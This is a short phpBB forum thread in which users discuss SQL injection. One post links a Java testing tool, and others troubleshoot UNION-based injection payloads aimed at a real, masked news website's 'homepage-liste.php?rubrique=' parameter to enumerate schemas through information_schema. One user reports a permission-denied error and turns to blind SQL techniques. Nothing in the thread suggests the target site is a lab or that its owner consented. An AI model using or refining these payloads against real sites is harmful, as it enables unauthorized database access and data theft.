|
|
|
IT Security and Insecurity Portal |
|
|
|
Hello the community.
For those who wants to test quickly SQL injection, I've found this little app in Java.
App :http://www.scrt.ch/outils/mms/mms_03.jar
Source Code :http://www.scrt.ch/outils/ ... |
|
|
|
|
Yep, that's the bad thing.
So I have to use Blind SQL Technics.
But there is still one last question ; why the user can't use the SELECT SQL command? |
|
|
|
|
Still doesn't work
SELECT command denied to user '***_actualites'@'localhost' for table 'tables'
|
|
|
|
|
That doesn't work
http://****/actualites/homepage-liste.php?rubrique=-1+AND+1=0+UNION+SELECT+ALL+1,2,3,4,5,group_concat(schema_table),7,8,9,10,11,12,13,14+from+information_schema.table ... |
|
|
|
|
Hi all,
I've got some troubles with a sql injection :
http://**/homepage-liste.php?rubrique=-1+AND+1=0+UNION+SELECT+ALL+1,2,3,4,5,group_concat(schema_name),7,8,9,10,11,12,13,14+from+ ... |
|
|
Page 1 of 1 |
All times are GMT |
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|